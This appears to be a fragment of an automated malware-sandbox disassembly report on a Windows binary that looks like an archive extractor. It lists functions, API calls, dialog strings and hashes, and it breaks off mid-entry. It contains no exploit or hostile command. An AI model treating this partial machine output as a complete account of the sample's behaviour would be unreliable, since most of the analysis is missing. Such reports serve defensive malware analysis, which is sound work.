                                          Similarity
                                          • API ID: ItemText$DialogWindow
                                          • String ID: ASKNEXTVOL
                                          • API String ID: 445417207-3402441367
                                          • Opcode ID: 62f0f56b70a886ff7e8654eecac45ac1992f7c9ee873dd70974f72a7b132d1e4
                                          • Instruction ID: 536e9dab993fe3b8791e3eb26d05ead32b481c1632ea2bffe1f9318aca2a6741
                                          • Opcode Fuzzy Hash: 62f0f56b70a886ff7e8654eecac45ac1992f7c9ee873dd70974f72a7b132d1e4
                                          • Instruction Fuzzy Hash: 9811D332A40214AFEB219F68DC89FAA3769FB4A752F100402F241DB4A0C7629945B7A2
                                          Function 00F8D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                          • __fprintf_l.LIBCMT ref: 00F8D954
                                          • _strncpy.LIBCMT ref: 00F8D99A
                                            • Part of subcall function 00F91DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00FC1030,00000200,00F8D928,00000000,?,00000050,00FC1030), ref: 00F91DC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                          • String ID: $%s$@%s
                                          • API String ID: 562999700-834177443
                                          • Opcode ID: 235793435fd0a283e8a539f05213e641999b48d255cadfa7364efc06a35acd0b
                                          • Instruction ID: d8ab215f35ea5b44d81ccef06263d23566b7f2dd1cb3c9759d2d183684e3565c
                                          • Opcode Fuzzy Hash: 235793435fd0a283e8a539f05213e641999b48d255cadfa7364efc06a35acd0b
                                          • Instruction Fuzzy Hash: DF216072840248AEEF21EEA4CC06FEE7BACAF05714F140522F910961E2E675D658EF51
                                          Function 00F90E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E85
                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E8F
                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00F8AC5A,00000008,?,00000000,?,00F8D22D,?,00000000), ref: 00F90E9F
                                          Strings
                                          • Thread pool initialization failed., xrefs: 00F90EB7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                          • String ID: Thread pool initialization failed.
                                          • API String ID: 3340455307-2182114853
                                          • Opcode ID: 533559ff05033480b03399b765f53e44d41c9c6d51b9b7d3a0e500abfb7f9b04
                                          • Instruction ID: 0199180982d1cf2d23a4b289eccf8c1a388872c83931c400812f1600907d5aa7
                                          • Opcode Fuzzy Hash: 533559ff05033480b03399b765f53e44d41c9c6d51b9b7d3a0e500abfb7f9b04
                                          • Instruction Fuzzy Hash: 3D1191B1A407089FD3216F66DD84AA7FBECEB55754F14482EF1DAC2201DA719940AB50
                                          Function 00F9B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F81316: GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                            • Part of subcall function 00F81316: SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          • EndDialog.USER32(?,00000001), ref: 00F9B2BE
                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00F9B2D6
                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00F9B304
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemText$DialogWindow
                                          • String ID: GETPASSWORD1
                                          • API String ID: 445417207-3292211884
                                          • Opcode ID: 11d5c5955187d2e6701fa3496093b05f08b23ecdb02213348711e28979b25339
                                          • Instruction ID: f57e83b5b35c74c7014e47d62ead32a5b1c6f57ce796d9dfe318be9304a11991
                                          • Opcode Fuzzy Hash: 11d5c5955187d2e6701fa3496093b05f08b23ecdb02213348711e28979b25339
                                          • Instruction Fuzzy Hash: 8211A5329001297AEF22AF64AE4DFFE376CEB1A750F000021FA45B7180C7A49A45B761
                                          Function 00F9DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                          • API String ID: 0-56093855
                                          • Opcode ID: fb457fc91445bdc1263d6dc632620cd80f7c157884bba1d4282c8c0b994d9bc0
                                          • Instruction ID: a24a90cc96e19001c68102476771459a5a061d4f513780535a34b9d95954e738
                                          • Opcode Fuzzy Hash: fb457fc91445bdc1263d6dc632620cd80f7c157884bba1d4282c8c0b994d9bc0
                                          • Instruction Fuzzy Hash: E9019E76E04249AFEF149F65ED49E963BA9F709394B200026F90583231C6319850FBA0
                                          Function 00FA9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __alldvrm$_strrchr
                                          • String ID:
                                          • API String ID: 1036877536-0
                                          • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                          • Instruction ID: 4161faf5f0ebd6b237cfed243dbd3e6ad95021a89548517bafa6614a8946ab38
                                          • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                          • Instruction Fuzzy Hash: A6A15AB2E087869FEB21CF18C8917AEBBE5EF57360F14417DE4859B281C2B89D41E750
                                          Function 00F8A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00F87F69,?,?,?), ref: 00F8A3FA
                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00F87F69,?), ref: 00F8A43E
                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00F87F69,?,?,?,?,?,?,?), ref: 00F8A4BF
                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00F87F69,?,?,?,?,?,?,?,?,?,?), ref: 00F8A4C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$Create$CloseHandleTime
                                          • String ID:
                                          • API String ID: 2287278272-0
                                          • Opcode ID: fe632c9699725f83f085d1f470372d281ab4eecda0a62064506eab4adac7d995
                                          • Instruction ID: efd79be909bd1dc02bb0c5ad315e89045a7321ac95ec721366380d8f9721e274
                                          • Opcode Fuzzy Hash: fe632c9699725f83f085d1f470372d281ab4eecda0a62064506eab4adac7d995
                                          • Instruction Fuzzy Hash: F941C1316883819AEB31EF24DC45FEEBBE4EF85310F04091EB5D193191D6A99A48EB53
                                          Function 00F81100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID:
                                          • API String ID: 176396367-0
                                          • Opcode ID: f98838220e7f1aec3779be71f376853ae814f490dfe8d41498fc9b7c25d9778e
                                          • Instruction ID: c9d797123268473f30826f744df956e92cbb2a3f3ad8ed5281f383eec3c60cb5
                                          • Opcode Fuzzy Hash: f98838220e7f1aec3779be71f376853ae814f490dfe8d41498fc9b7c25d9778e
                                          • Instruction Fuzzy Hash: FC41A5719006699BDB21AF688C4A9EF7BBCEF01320F000129FD45F7255DF34AE599BA4
                                          Function 00FAC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00FA91E0,?,00000000,?,00000001,?,?,00000001,00FA91E0,?), ref: 00FAC9D5
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FACA5E
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00FA6CBE,?), ref: 00FACA70
                                          • __freea.LIBCMT ref: 00FACA79
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          • Opcode ID: df1157e856f2cb6e4cab9450c1ef8c31eddf4d5f4500db3382782a54b763dba8
                                          • Instruction ID: 2d01c36e03a5635e3708fae0107a51d0a17e18a32b7aea6b149932e5c6f46ac2
                                          • Opcode Fuzzy Hash: df1157e856f2cb6e4cab9450c1ef8c31eddf4d5f4500db3382782a54b763dba8
                                          • Instruction Fuzzy Hash: 5531B2B2A0020AABDF24DF65CC95DFE7BA5EB42320B144228FC14E6250E739DD50EBD0
                                          Function 00F9A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 00F9A666
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F9A675
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F9A683
                                          • ReleaseDC.USER32(00000000,00000000), ref: 00F9A691
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: CapsDevice$Release
                                          • String ID:
                                          • API String ID: 1035833867-0
                                          • Opcode ID: 8a600a290acae9a57c7c194a318fdd6be2778543c670fa73dd4505d222a9fb8f
                                          • Instruction ID: fde0651812eed21b41d1fb13133a1ef9cf191122707b4fe1d850e38b40a62bfe
                                          • Opcode Fuzzy Hash: 8a600a290acae9a57c7c194a318fdd6be2778543c670fa73dd4505d222a9fb8f
                                          • Instruction Fuzzy Hash: F6E0C231942B65B7D3609B60BC4EF8B3E14AB05BA7F010110FB059F1D0DB748600ABE0
                                          Function 00F9A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F9A699: GetDC.USER32(00000000), ref: 00F9A69D
                                            • Part of subcall function 00F9A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F9A6A8
                                            • Part of subcall function 00F9A699: ReleaseDC.USER32(00000000,00000000), ref: 00F9A6B3
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00F9A83C
                                            • Part of subcall function 00F9AAC9: GetDC.USER32(00000000), ref: 00F9AAD2
                                            • Part of subcall function 00F9AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00F9AB01
                                            • Part of subcall function 00F9AAC9: ReleaseDC.USER32(00000000,?), ref: 00F9AB99
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ObjectRelease$CapsDevice
                                          • String ID: (
                                          • API String ID: 1061551593-3887548279
                                          • Opcode ID: a9373792f81b6fd44a055f73516eb2fdba168b407ada0b89c6b92507fc05c40f
                                          • Instruction ID: 268dbb923b5dbf1f74b2c773024f6a5495c01953fea701d4fc58c1ad6f0b1104
                                          • Opcode Fuzzy Hash: a9373792f81b6fd44a055f73516eb2fdba168b407ada0b89c6b92507fc05c40f
                                          • Instruction Fuzzy Hash: 1491E271604354AFEA11DF25C888A2BBBE8FFC9714F00491EF596D7260DB30A905DFA2
                                          Function 00FAB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00FAB324
                                            • Part of subcall function 00FA9097: IsProcessorFeaturePresent.KERNEL32(00000017,00FA9086,00000050,00FB3A34,?,00F8D710,00000004,00FC1030,?,?,00FA9093,00000000,00000000,00000000,00000000,00000000), ref: 00FA9099
                                            • Part of subcall function 00FA9097: GetCurrentProcess.KERNEL32(C0000417,00FB3A34,00000050,00FC1030), ref: 00FA90BB
                                            • Part of subcall function 00FA9097: TerminateProcess.KERNEL32(00000000), ref: 00FA90C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: *?$.
                                          • API String ID: 2667617558-3972193922
                                          • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                          • Instruction ID: c5693ae16dc543b71960971623d64d464a644d595da7cc02df21ba6039733bac
                                          • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                          • Instruction Fuzzy Hash: 005181B1E0020AAFDF15DFA8CC81AADBBF5EF59310F24816AE854E7341E7759E019B50
                                          Function 00F875DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F875E3
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F8A56D: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F8777F
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A501
                                            • Part of subcall function 00F8A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00F8A325,?,?,?,00F8A175,?,00000001,00000000,?,?), ref: 00F8A532
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                          • String ID: :
                                          • API String ID: 3226429890-336475711
                                          • Opcode ID: 808614c0139e7998e8ce2530200c8878dcb90d86a43edac8c75d1a4868632537
                                          • Instruction ID: 2f085b497ac5bdf021911c4a23fe976b2a8bc9930ce5e685e590ea050f5e122d
                                          • Opcode Fuzzy Hash: 808614c0139e7998e8ce2530200c8878dcb90d86a43edac8c75d1a4868632537
                                          • Instruction Fuzzy Hash: DA417271804258A9EF25FB64CC5AEEEB77CEF45300F144096B605A7092DB789F88EF61
                                          Function 00F9B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: }
                                          • API String ID: 176396367-4239843852
                                          • Opcode ID: 062f09f3e4997be56aa785c18914109f794f4c5db4ef65c085cdcd5221d79425
                                          • Instruction ID: 8de648e7d2563ee783569698dbcf99e74bae4f1ce66b15203153df7a06339ff2
                                          • Opcode Fuzzy Hash: 062f09f3e4997be56aa785c18914109f794f4c5db4ef65c085cdcd5221d79425
                                          • Instruction Fuzzy Hash: 8C21C672D043165AEB31EA64EE45F6BB3DCDF92760F09042AF540C3145EB69DD48B3A2
                                          Function 00F8F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F8F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00F8F2E4
                                            • Part of subcall function 00F8F2C5: GetProcAddress.KERNEL32(00FC81C8,CryptUnprotectMemory), ref: 00F8F2F4
                                          • GetCurrentProcessId.KERNEL32(?,?,?,00F8F33E), ref: 00F8F3D2
                                          Strings
                                          • CryptProtectMemory failed, xrefs: 00F8F389
                                          • CryptUnprotectMemory failed, xrefs: 00F8F3CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AddressProc$CurrentProcess
                                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                          • API String ID: 2190909847-396321323
                                          • Opcode ID: 0a72ced650378e6fba2d6ff6930867564d87373d37f5f2a7aaacd803ebcce330
                                          • Instruction ID: 96134f524bead8812190d89812bfa2b5f08cbdb02e0a795dec2a0b0817fd0701
                                          • Opcode Fuzzy Hash: 0a72ced650378e6fba2d6ff6930867564d87373d37f5f2a7aaacd803ebcce330
                                          • Instruction Fuzzy Hash: 37112931A00229AFDF167F25DD42AEE3754FF01770B144126FC01AB251DA349D06BB91
                                          Function 00F8B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • _swprintf.LIBCMT ref: 00F8B9B8
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
